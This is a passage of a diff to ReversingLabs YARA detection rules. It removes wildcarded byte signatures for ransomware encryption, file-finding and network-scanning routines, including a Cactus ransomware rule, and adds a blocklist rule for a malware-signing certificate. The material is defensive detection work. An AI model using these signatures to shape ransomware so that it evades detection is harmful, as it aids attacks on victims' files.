-            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 8B 02 50 66 8B 4D ?? 51
-        }
-		$encrypt_files_p2 = {
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? FF 15 ??
-            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 89 45 ?? 83 7D
-            ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ??
-            EB ?? C7 45 ?? ?? ?? ?? ?? 66 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 8D 45 ?? 50 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 8B 08 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 50 8B 45 ?? 8B 08 51 8D 55 ?? 52
-            FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ??
-            FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D
-            ?? FF 15 ?? ?? ?? ?? C3 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15
-            ?? ?? ?? ?? C3 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B
-            45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$scan_network_p1 = {
-            55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52
-            FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 4D ?? 51 8B
-            95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ??
-            83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? FF
-            15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D
-            4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
-            45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D
-            4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
-            8B 08 8B 55 ?? 52 FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2
-            89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF
-        }
-		$scan_network_p2 = {
-            15 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF
-            15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ??
-            ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82
-            50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 2B
-            51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? B9
-            ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
-            ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B
-            42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA
-            ?? ?? ?? ?? 2B 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
-            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ??
-            33 C9 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B
-            55 ?? 33 C0 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
-            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 5D ??
-            C7 45 ?? ?? ?? ?? ?? DD 45 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 41 ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-        }
-		$scan_network_p3 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
-            ?? 52 8D 85 ?? ?? ?? ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8B 02 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ??
-            ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15
-            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B 11 8B 85 ?? ?? ?? ?? 50 FF 52 ?? DB E2 89 85 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 55 ?? 52
-            FF 15 ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 51 ?? DB E2 89
-            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-        }
-		$scan_network_p4 = {
-            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52
-            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 50 8D 4D ?? 51
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ??
-            51 FF 50 ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 9B 68 ?? ?? ?? ?? EB ?? 8D
-            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ??
-            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C3 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? FF 15 ?? ?? ??
-            ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? C3 8B 4D
-            ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B 45 ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $scan_network_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEGAPOLISELIT, OOO" and ( pe.signatures [ i ] . serial == "00:dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" or pe.signatures [ i ] . serial == "dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" ) and 1497916800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Cactus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cactus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f391919a-b433-5f8d-8051-f0467118fa1b"
-		date = "2023-12-15"
-		modified = "2023-12-15"
+		id = "4645eeae-2aea-59aa-a6bf-095bb9d0d711"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Cactus.yara#L1-L190"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2953b67e926cb653df0de208b098da3d5c16e6690842ab28fbf8c37cd16f54d7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15628-L15644"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0516af7b27d244f21c9cea62fe599725d412e385e34f5f3f4f618d565365d321"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cactus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 41 57 41 56 41 55 41 54 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24
-            ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            89 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 4C 8D 4D
-            ?? 4C 8D 45 ?? 48 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48
-            89 54 24 ?? 48 8B 95 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 CA 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 45 ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
-            89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA
-            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2
-            48 8D 85 ?? ?? ?? ?? 41 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D
-        }
-		$encrypt_files_p2 = {
-            95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 48 83 C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95
-            ?? ?? ?? ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 29
-            C2 48 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 39 85 ?? ?? ?? ?? 0F 8D ?? ?? ??
-            ?? 48 89 E0 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 85 C0 48 0F 48 C2 48 C1 F8
-            ?? 48 C1 E0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 43 ?? 48 89 85 ?? ??
-            ?? ?? 48 89 D8 49 89 C4 41 BD ?? ?? ?? ?? 48 89 D8 49 89 C6 41 BF ?? ?? ?? ?? 48 89
-            D8 48 83 C0 ?? 48 C1 E8 ?? 48 C1 E0 ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D 44 24 ?? 48 83
-            C0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ??
-            ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 41 89 D9 4C 8B 85 ?? ?? ?? ?? 48 89 E9 48 8D
-            55 ?? 48 8B 85 ?? ?? ?? ?? 44 89 4C 24 ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48
-            8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 2B 85
-            ?? ?? ?? ?? 48 89 C2 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8
-        }
-		$encrypt_files_p3 = {
-            48 89 DA 48 8B 85 ?? ?? ?? ?? 48 01 D0 48 89 85 ?? ?? ?? ?? 90 48 89 F4 E9 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 48 63 C8 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48
-            89 C1 E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 89 E9 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48
-            8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 85 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 F0 ?? 84
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 55 ?? 48 01 C2 48 89 E9 48 8B 85 ?? ?? ??
-            ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ??
-            ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D 95 ?? ??
-            ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83
-            C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ??
-            ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
-         }
-		$encrypt_files_p4 = {
-            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89
-            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ??
-            FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 F4 48 89 C3 EB ?? 48 89 C3 48 8D
-            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ??
-            ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8D A5 ?? ??
-            ?? ?? 5B 5E 41 5C 41 5D 41 5E 41 5F 5D C3
-        }
-		$find_files_p1 = {
-            55 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ??
-            ?? ?? ?? 48 8D 45 ?? BB ?? ?? ?? ?? 48 89 C6 EB ?? 48 89 F1 E8 ?? ?? ?? ?? 48 83 EB
-            ?? 48 83 C6 ?? 48 85 DB 79 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0
-            0F 95 C0 84 C0 74 ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
-            84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63
-            D2 48 C1 E2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
-        }
-		$find_files_p2 = {
-            89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48
-            8D 85 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ??
-            83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? C6 05 ??
-            ?? ?? ?? ?? 48 8D 5D ?? 48 81 C3 ?? ?? ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ??
-            48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
-            C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89
-            C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C6 48 8D 5D ?? 48 81 C3 ?? ??
-            ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 48 89
-            F0 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5B 5E 5D C3
-        }
-		$check_processes = {
